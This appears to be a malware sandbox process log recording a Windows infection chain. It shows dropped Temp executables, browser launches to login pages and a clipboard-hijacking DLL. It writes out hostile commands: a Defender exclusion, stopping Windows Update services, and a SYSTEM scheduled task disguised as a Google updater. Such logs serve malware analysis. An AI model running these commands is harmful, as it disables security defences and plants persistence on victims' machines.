C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffa308e46f8,0x7ffa308e4708,0x7ffa308e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffa308e46f8,0x7ffa308e4708,0x7ffa308e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6276 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6712 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x164,0x168,0x140,0x16c,0x7ffa308e46f8,0x7ffa308e4708,0x7ffa308e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6696 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6856 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7760 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7940 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7940 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7576 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8084 /prefetch:1

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv /zi2gIPAGEK0BaWUV0OKpg.0.1

C:\Users\Admin\AppData\Local\Temp\DD6F.exe

C:\Users\Admin\AppData\Local\Temp\DD6F.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hK1FU6RE.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hK1FU6RE.exe

C:\Users\Admin\AppData\Local\Temp\DE2C.exe

C:\Users\Admin\AppData\Local\Temp\DE2C.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\MT2wE8kW.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\MT2wE8kW.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\vv7qj8ed.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\vv7qj8ed.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DF27.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\ih2Pf8XZ.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\ih2Pf8XZ.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Av10fD7.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Av10fD7.exe

C:\Users\Admin\AppData\Local\Temp\E0DD.exe

C:\Users\Admin\AppData\Local\Temp\E0DD.exe

C:\Users\Admin\AppData\Local\Temp\E1D8.exe

C:\Users\Admin\AppData\Local\Temp\E1D8.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Users\Admin\AppData\Local\Temp\E39E.exe

C:\Users\Admin\AppData\Local\Temp\E39E.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd4,0x108,0x7ffa308e46f8,0x7ffa308e4708,0x7ffa308e4718

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2636 -ip 2636

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8432 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2dU814HH.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2dU814HH.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2636 -s 540

C:\Users\Admin\AppData\Local\Temp\E63F.exe

C:\Users\Admin\AppData\Local\Temp\E63F.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8800 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa308e46f8,0x7ffa308e4708,0x7ffa308e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9020 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5096 -ip 5096

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5096 -s 768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa308e46f8,0x7ffa308e4708,0x7ffa308e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7564 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa308e46f8,0x7ffa308e4708,0x7ffa308e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4496 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa308e46f8,0x7ffa308e4708,0x7ffa308e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8708 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xdc,0x104,0x7ffa308e46f8,0x7ffa308e4708,0x7ffa308e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7488 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa308e46f8,0x7ffa308e4708,0x7ffa308e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8184 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa308e46f8,0x7ffa308e4708,0x7ffa308e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8568 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9684 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9672 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7520 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=9984 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x410 0x4e0

C:\Users\Admin\AppData\Local\Temp\FF0.exe

C:\Users\Admin\AppData\Local\Temp\FF0.exe

C:\Users\Admin\AppData\Local\Temp\131E.exe

C:\Users\Admin\AppData\Local\Temp\131E.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\is-EMHNF.tmp\LzmwAqmV.tmp

"C:\Users\Admin\AppData\Local\Temp\is-EMHNF.tmp\LzmwAqmV.tmp" /SL5="$C021C,3039358,68096,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe

"C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe" -i

C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe

"C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe" -s

C:\Users\Admin\AppData\Local\Temp\3696.exe

C:\Users\Admin\AppData\Local\Temp\3696.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "HAC1030-3"

C:\Users\Admin\AppData\Local\Temp\2FAF.exe

C:\Users\Admin\AppData\Local\Temp\2FAF.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 7480 -ip 7480

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7480 -s 784

C:\Users\Admin\AppData\Local\Temp\43B6.exe

C:\Users\Admin\AppData\Local\Temp\43B6.exe

C:\Users\Admin\AppData\Local\Temp\480D.exe

C:\Users\Admin\AppData\Local\Temp\480D.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4740 -ip 4740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4740 -s 572

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

